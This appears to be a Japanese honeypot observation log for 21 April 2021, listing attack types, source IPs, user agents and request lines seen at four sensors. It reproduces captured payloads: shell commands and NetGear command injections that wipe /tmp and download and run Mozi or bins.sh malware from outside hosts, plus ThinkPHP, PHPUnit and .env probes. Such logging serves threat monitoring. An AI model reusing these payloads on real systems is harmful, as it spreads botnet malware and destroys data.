2021/04/21 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/04/21分です。

特徴

共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

NetGear製品の脆弱性を狙うアクセス
GoogleBotによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//123[.]5[.]145[.]79:42820/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//59[.]99[.]41[.]206:56514/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：US

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：UK

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  http://45.85.90.131/bins.sh;
chmod 777 /tmp/bins.sh;
sh /tmp/bins.sh

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//27[.]203[.]3[.]179:34159/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//45[.]229[.]55[.]44:36811/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

GPONルータの脆弱性を狙うアクセス Apache Tomcatへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

他

アクセス数推移

JP：総アクセス数：229 (前日比：+174)
US：総アクセス数：41 (前日比：-7)
UK：総アクセス数：52 (前日比：-65)
SG：総アクセス数：70 (前日比：-93)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.15.175.155	China
1	1.82.196.222	China
1	8.133.179.231	Singapore
1	18.217.128.90	United States
1	27.203.4.188	China
1	34.68.10.105	United States
1	40.122.76.169	United States
1	45.33.83.87	United States
22	45.155.205.211	Russia
1	47.118.50.48	China
1	47.241.125.249	United States
1	49.143.32.6	South Korea
1	49.234.47.214	China
1	52.146.33.219	United States
1	59.99.41.206	India
1	64.77.244.130	United States
1	81.169.250.103	Germany
2	84.17.59.70	United Kingdom
1	87.121.52.88	Bulgaria
1	103.24.109.180	India
1	107.173.103.103	United States
1	109.94.164.28	Iran
5	111.7.96.153	China
1	119.118.28.108	China
1	121.5.145.96	China
1	121.5.226.36	China
1	123.5.145.79	China
3	129.213.83.97	United States
1	139.162.208.7	Netherlands
1	140.238.242.141	United States
2	150.136.75.66	United States
151	152.32.239.174	Hong Kong
1	159.65.200.185	United States
1	160.176.245.129	Morocco
4	165.232.156.47	United States
2	172.104.83.143	United States
1	173.213.86.41	United States
1	178.175.24.1	Albania
1	178.175.116.194	Albania
1	192.241.216.39	United States
1	193.118.53.210	United States
1	194.33.45.36	United Kingdom
2	205.185.122.102	United States
1	209.141.54.139	United States
1	212.154.7.246	Turkey

UserAgent一覧

件数	UserAgent
24	-
4	Chrome/54.0 (Windows NT 10.0)
1	GoogleBot
3	Hello, world
1	Mozilla/5.0
4	Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36
1	Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
136	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
22	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 zgrab/0.x
2	curl/7.47.0
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
15		-
1		\x16\x03
1		\x16\x03\x01\x02
20	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/Content/common/web/CommonActivity.css	HTTP/1.1
1	GET	/Content/css/wzwstylel.css	HTTP/1.1
1	GET	/Front/FctPage/Start.aspx	HTTP/1.1
1	GET	/Front/User/UserLogin.html	HTTP/1.1
1	GET	/Home/Bind/binding	HTTP/1.1
1	GET	/Home/Get/getJnd28	HTTP/1.1
1	GET	/JS/loginstatus.js	HTTP/1.1
1	GET	/Pc/Lang/index.html	HTTP/1.1
1	GET	/Promotions/list.mvc	HTTP/1.1
1	GET	/Public/Home/ecshe_css/main.css?v=1543997196	HTTP/1.1
1	GET	/Public/Mobile/ecshe_css/wapmain.css?v=1545408652	HTTP/1.1
1	GET	/Public/Wchat/js/cvphp.js	HTTP/1.1
1	GET	/Public/css/hall.css	HTTP/1.1
1	GET	/Public/home/common/js/index.js	HTTP/1.1
1	GET	/Public/home/js/fukuang.js	HTTP/1.1
1	GET	/Public/home/wap/css/qdgame.css	HTTP/1.1
1	GET	/Public/initJs.php	HTTP/1.1
1	GET	/Public/mobile/js/config.js	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/Scripts/common.js	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/Templates/user/finance/css/userPay.css	HTTP/1.1
1	GET	/Templates/user/js/global.js	HTTP/1.1
1	GET	/Wap/Api/getSystemNotice?id=1	HTTP/1.1
1	GET	/Wap/JS/wap-index.js	HTTP/1.1
4	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/account/login	HTTP/1.1
1	GET	/admin/index	HTTP/1.1
1	GET	/admin_user/consume.php	HTTP/1.1
1	GET	/admin_user/m_tixian.php	HTTP/1.1
1	GET	/ajax/allcoin_a/id/0?t=0.3782499195965951	HTTP/1.1
1	GET	/api/ApiHub/fetchJinse	HTTP/1.1
1	GET	/api/Index/getLottery	HTTP/1.1
1	GET	/api/api.php?action=getActivity&searchTitle=	HTTP/1.1
1	GET	/api/common/getConfig	HTTP/1.1
1	GET	/api/config-init	HTTP/1.1
1	GET	/api/content_bottom	HTTP/1.1
1	GET	/api/currency/quotation_new	HTTP/1.1
1	GET	/api/index/loansList	HTTP/1.1
1	GET	/api/message/webInfo	HTTP/1.1
1	GET	/api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1	HTTP/1.1
1	GET	/api/site/getInfo.do	HTTP/1.1
1	GET	/api/uploads/apimap	HTTP/1.1
1	GET	/api/user/get_user_group	HTTP/1.1
1	GET	/api/user/info?&&callback=jsonp_1601457046411_20983	HTTP/1.1
1	GET	/api/user/ismustmobile	HTTP/1.1
1	GET	/api/v/index/queryOfficePage?officeCode=customHomeLink	HTTP/1.1
1	GET	/api/v1/invest	HTTP/1.1
1	GET	/api/web/user/getIndexData.php	HTTP/1.1
1	GET	/api2/1/orderBook/btc_usdt	HTTP/1.1
1	GET	/assets/extension/market/css/mt4.css	HTTP/1.1
1	GET	/assets/js/dmshub.js	HTTP/1.1
1	GET	/assets/res/mods/room.js	HTTP/1.1
1	GET	/banner.do?code=1	HTTP/1.1
1	GET	/base/exchange_article/index/classid/1/id/1	HTTP/1.1
1	GET	/base/exchange_index/changepwdfirst	HTTP/1.1
1	GET	/base/goexjs	HTTP/1.1
1	GET	/check.php	HTTP/1.1
1	GET	/common/member/js/user.util.js	HTTP/1.1
1	GET	/common/template/lottery/lecai/css/style.css	HTTP/1.1
1	GET	/config.js	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/cscpLoginWeb/scripts/public.js	HTTP/1.1
1	GET	/css/all.css	HTTP/1.1
1	GET	/css/app.css	HTTP/1.1
1	GET	/css/dafa.css	HTTP/1.1
1	GET	/css/info.css	HTTP/1.1
1	GET	/css/main.css	HTTP/1.1
1	GET	/css/nsc/reset.css	HTTP/1.1
1	GET	/css/skin/ymPrompt.css	HTTP/1.1
1	GET	/css/style.css	HTTP/1.1
1	GET	/css/view/main/style.css	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/ff/css/cssy.css	HTTP/1.1
1	GET	/files/pub_reset.css	HTTP/1.1
1	GET	/getConfig/getArticle.do?code=1	HTTP/1.1
1	GET	/getConfig/getArticle.do?code=19	HTTP/1.1
1	GET	/getConfig/listPopFrame.do?code=14&position=index&_=1601489645097	HTTP/1.1
1	GET	/getLocale	HTTP/1.1
1	GET	/gitupdate.php?action=dashboard	HTTP/1.1
1	GET	/home/loadmymanager	HTTP/1.1
2	GET	/homes/	HTTP/1.1
1	GET	/iframe/rankgiftgotapi/1005	HTTP/1.1
1	GET	/index.html	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index/api/config	HTTP/1.1
1	GET	/index/index/andiro	HTTP/1.1
1	GET	/infe/rest/flash/getServerIP.json	HTTP/1.1
1	GET	/info.php	HTTP/1.1
1	GET	/invoker/readonly	HTTP/1.1
1	GET	/js/base.js	HTTP/1.1
1	GET	/js/base1.js	HTTP/1.1
1	GET	/js/config20181225.js	HTTP/1.1
1	GET	/js/json.js	HTTP/1.1
1	GET	/js/tvConfig.js	HTTP/1.1
1	GET	/kefu.php	HTTP/1.1
1	GET	/lanren/css/global.css	HTTP/1.1
1	GET	/leftDao.php?callback=jQuery183016740860980352856_1604309800583	HTTP/1.1
1	GET	/login/img/nyyh/chkjs.js	HTTP/1.1
1	GET	/login/img/nyyh/game.css	HTTP/1.1
1	GET	/m/allticker/1	HTTP/1.1
1	GET	/m/ticker/usdtqc	HTTP/1.1
2	GET	/manager/html	HTTP/1.1
1	GET	/market/detail/merged?symbol=btcusdt	HTTP/1.1
1	GET	/market/market-ws/iframe.html	HTTP/1.1
1	GET	/member/js/lang_zh_CN.js	HTTP/1.1
1	GET	/mobile/config.js	HTTP/1.1
1	GET	/mobile/script/main.m.js	HTTP/1.1
1	GET	/mobile/v3/appSuperDownload.do	HTTP/1.1
1	GET	/mtja.html	HTTP/1.1
1	GET	/n/news/banner?column_id=303	HTTP/1.1
1	GET	/nyyh/chkjs.js	HTTP/1.1
1	GET	/nyyh/game.css	HTTP/1.1
1	GET	/otc/	HTTP/1.1
1	GET	/portal/index/protocol.html	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/public/admin.php/api/index/loansList	HTTP/1.1
1	GET	/public/js/global.js	HTTP/1.1
1	GET	/public/wap/js/basis.js	HTTP/1.1
1	GET	/public/web/js/add/com.js	HTTP/1.1
1	GET	/register.asp	HTTP/1.1
1	GET	/resources/main/common.js	HTTP/1.1
1	GET	/room/getRoomBangFans	HTTP/1.1
1	GET	/room/script/face.js	HTTP/1.1
1	GET	/s_api/basic/download/info	HTTP/1.1
1	GET	/script/public.js	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//122[.]22[.]1[.]33:32889/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//123[.]5[.]145[.]79:42820/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//59[.]99[.]41[.]206:56514/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/skin/main/onload.js	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/static/admincp/js/common.js	HTTP/1.1
1	GET	/static/common/js/common.js	HTTP/1.1
1	GET	/static/data/configjs.js	HTTP/1.1
1	GET	/static/data/thirdgames.json	HTTP/1.1
1	GET	/static/diff_worker.js	HTTP/1.1
1	GET	/static/guide/ab.css	HTTP/1.1
1	GET	/static/index/css/iindex.css	HTTP/1.1
1	GET	/static/wap/css/index.css	HTTP/1.1
1	GET	/statics/js/API.js	HTTP/1.1
1	GET	/storage/.env	HTTP/1.1
1	GET	/style.css	HTTP/1.1
1	GET	/template/920ka/js/woodyapp.js	HTTP/1.1
1	GET	/template/tmp1/js/common.js	HTTP/1.1
1	GET	/user/Login	HTTP/1.1
1	GET	/user/allroleinfo	HTTP/1.1
1	GET	/vendor/.env	HTTP/1.1
3	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wap/api/exchangerateuserconfig!get.action	HTTP/1.1
1	GET	/wap/trading/get_newallorder_ajax	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	/zz2/address.php?gid=651	HTTP/1.1
1	GET	http[:]//passport[.]baidu[.]com/	HTTP/1.1
1	GET	http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html	HTTP/1.1
2	HEAD	/	HTTP/1.1
1	HEAD	/register.asp	HTTP/1.1
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
3	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/config	HTTP/1.1
1	POST	/index.htm	HTTP/1.1
1	POST	/login/kefuxian.mvc	HTTP/1.1
1	POST	/m.api	HTTP/1.1
1	POST	/user/login	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.188.210.227	Russia
1	40.112.129.150	United States
1	45.144.225.132	Netherlands
11	45.155.205.211	Russia
6	106.201.4.87	India
1	112.95.80.216	China
1	113.245.96.106	China
1	128.14.134.134	United States
1	143.198.239.208	United States
7	146.56.241.9	China
3	163.172.161.118	United Kingdom
4	185.142.236.34	Seychelles
1	192.241.220.25	United States
2	205.185.122.102	United States

UserAgent一覧

件数	UserAgent
4	-
2	Hello, World
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
7	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3; rv:52.4.0) Gecko/20100101 Firefox/52.4.0
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1
1	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
3	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/application/.env	HTTP/1.1
1	GET	/config/.env	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/resources/.env	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//5[.]188[.]210[.]227/echo.php	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/_ignition/execute-solution	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//allisonhayden[.]xyz/41f1faf6b17ba5cbe3b870485fe30bf400e5edc407d93cadf2933406942ecd2f1cec65531ec071f2b955a1c22a93c0aa808ead4b6149359e954273dcc438130a5cd6f68cb501cc02a6bc9b45334ceda1df56741f30d79d7dcecf8f3f9e41bea5	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.83.245.228	China
1	8.134.52.18	Singapore
1	27.203.3.179	China
1	45.143.99.69	Turkey
22	45.155.205.211	Russia
1	45.229.55.44	Brazil
1	46.101.248.211	United States
1	49.89.14.189	China
1	66.240.205.34	United States
2	107.179.35.246	United States
1	109.94.164.28	Iran
1	121.5.219.20	China
1	121.231.53.85	China
3	122.51.57.204	China
1	128.14.211.190	United States
5	132.145.19.203	United States
2	152.228.139.1	France
1	177.200.163.118	Brazil
1	178.141.215.5	Russia
1	178.175.62.61	Albania
1	192.241.219.168	United States
1	205.185.122.102	United States
1	222.141.188.92	China

UserAgent一覧

件数	UserAgent
7	-
1	Go-http-client/1.1
2	Hello, World
3	Hello, world
5	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)
1	Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.62 XWEB/2692 MMWEBSDK/200901 Mobile Safari/537.36
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
3	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 zgrab/0.x
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		Gh0st\xad
2	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/ReportServer	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
4	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/phpmyadmin4.8.5/index.php	HTTP/1.1
1	GET	/pmd/index.php	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//121[.]231[.]53[.]85:58917/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//178[.]175[.]62[.]61:44373/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//222[.]141[.]188[.]92:58034/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ http[:]//45[.]85[.]90[.]131/bins.sh;chmod+777+/tmp/bins.sh;sh+/tmp/bins.sh
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]203[.]3[.]179:34159/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//45[.]229[.]55[.]44:36811/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/tools/	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//m[.]baidu[.]com/?r=_324567762814626501671680	HTTP/1.0
1	GET	http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html	HTTP/1.1
1	GET	http[:]//www[.]ceek[.]jp/?r=_4903874392018911345304544	HTTP/1.0
2	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/api/jsonws/expandocolumn/update-column	HTTP/1.1
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/ui/vropspluginui/rest/services/uploadova	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/version	HTTP/1.1
2	POST	/zend3/public/	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.28.87.68	United States
2	34.218.70.56	United States
1	45.133.1.226	Netherlands
1	45.143.99.69	Turkey
22	45.155.205.211	Russia
1	45.248.23.220	India
1	109.94.164.28	Iran
4	111.7.96.138	China
1	128.14.134.170	United States
7	128.199.123.239	United Kingdom
1	142.93.10.101	United States
10	142.93.107.50	United States
1	143.244.43.45	United Kingdom
1	159.65.200.185	United States
3	163.172.159.134	United Kingdom
1	165.227.87.60	United States
7	178.62.55.152	United States
1	185.32.164.145	Russia
1	194.61.25.4	Russia
2	205.185.122.102	United States
1	209.141.54.139	United States

UserAgent一覧

件数	UserAgent
15	-
2	Chrome/54.0 (Windows NT 10.0)
1	Go-http-client/1.1
1	Hello, World
1	Jakarta Commons-HttpClient/3.1
1	Mozilla/5.0
14	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/51.0.2830.34
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
5	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	curl/7.64.0
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
2		\x16\x03
1		\x16\x03\x01\x01\x8e\x01
1		\x16\x03\x01\x01\x9f\x01
2		\x16\x03\x01\x01\xa9\x01
1		\x16\x03\x02\x01\x9c\x01
1		\x16\x03\x03\x01J\x01
1		\x16\x03\x03\x01X\x01
2		\x16\x03\x03\x01\x9c\x01
1		\x16\x03\x03\x01s\x01
1	CONNECT	www[.]bing[.]com/:443	HTTP/1.1
5	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP	HTTP/1.1
1	GET	/Telerik.Web.UI.WebResource.axd?type=rau	HTTP/1.1
3	GET	/_ignition/execute-solution	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
2	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/index.html	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/jenkins/login	HTTP/1.1
2	GET	/login	HTTP/1.1
2	GET	/manager/html	HTTP/1.1
1	GET	/mgmt/tm/ltm	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/tools/	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	/wp-login.php	HTTP/1.1
1	GET	http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
